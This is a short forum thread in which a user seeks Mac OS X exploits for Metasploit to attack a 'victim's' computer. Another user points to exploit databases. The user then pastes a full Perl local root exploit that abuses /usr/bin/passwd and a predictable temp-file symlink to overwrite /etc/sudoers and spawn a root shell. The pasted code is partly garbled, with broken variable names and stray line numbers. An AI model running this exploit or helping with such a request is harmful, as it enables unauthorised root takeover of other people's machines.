Forum Thread: Any Exploits for Mac OSX?

Any Exploits for Mac OSX?

Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?

4 Responses

There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!

Yeah, thanks. But with which kind of program do I use script like this:

31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)

use POSIX;

$fakepasswd="/tmp/xpasswd.$$";
$passwd
pid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";

sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fake
passwd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fake
passwd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwd
tempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fake
passwd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);

Share Your Thoughts

  • Hot
  • Active